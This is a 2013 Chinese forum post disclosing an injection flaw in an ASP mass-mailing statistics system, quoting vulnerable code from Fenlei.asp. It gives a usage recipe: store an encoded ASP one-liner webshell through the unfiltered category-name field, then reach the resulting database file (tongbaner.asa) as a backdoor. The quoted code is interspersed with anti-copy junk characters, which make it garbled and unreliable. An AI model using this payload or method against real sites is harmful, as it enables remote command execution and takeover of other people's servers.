找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2056|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
'Fenlei.asp 3 b3 j5 ~* ]" @" {

- h+ _: N8 O/ C% v5 _* nIF Request.QueryString("Action")="del" Then / J: f/ v7 F6 Y' k' \6 i
ID=Request.QueryString("ID") 0 r0 B+ y- `. i2 x% a
IF Countss ("tui","Fenlei",ID )<>0 then
6 w; r5 r6 `' K5 H3 i. V$ s'略 . g# [) y( U3 O5 {" G
IF Request.QueryString("Action")="Add" Then
+ A: {* A8 Q4 N5 {Tname=Request.Form("Typename")
# m. U2 M- ?8 a+ b" Y/ {% KSet Rs=Server.CreateObject("adodb.Recordset")
/ G' C: u6 c$ X( @) D) \Sql="Select * From Fenlei Order by id Desc " , n4 h) B$ F' X* U
Rs.Open Sql,Conn,1,3
9 n+ E; i/ x( o% m, T" DRs.Addnew
2 ~: J9 m: l2 V; [) ^Rs("Typename")=Tname
$ z( F; B" v- W& ^+ ]" B- \5 W'略 . {3 j! ^! H/ z$ g& Y
Set Rs=Server.CreateObject("adodb.Recordset") ; ?+ B& t: w$ k0 Z% h
Sql="Select * From Fenlei Order by id Desc " ' W3 N# d( ]0 J: R7 [; i4 k
Rs.Open Sql,Conn,1,1
4 a/ Y" C9 U% @2 H! ?3 |5 x  l'略 . {# e$ N7 \  O
%>* o. Z9 z5 V. Q- s) B) h
+ M% C& P' Q5 e4 ]5 m  |) M
9 J) f" J3 p" J0 R6 ?

8 v" ~  u+ J5 w- K4 x没有过滤,直接写入数据库。3 u0 h) S' D. E$ r

4 H7 g$ p% f. w. X9 }利用方法:& Z" _7 N& Y$ k  o" X

- z2 j8 \2 q, t7 |! w& n. d" S# T插入:┼攠數畣整爠煥敵瑳∨≡┩>- A) N/ }8 \2 |' U7 t" o
# A8 |  E+ p3 I0 `1 W) l
2 z4 Z9 ]  z5 f
连接: http://www.xxx.com/###tongbaner.asa
8 b1 w# P2 e2 C% S( {. ~5 G0 d2 }'默认安装文件:
, J! F7 a; P* n* s: v( V'install.asp
1 V4 H4 l: R2 X  n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表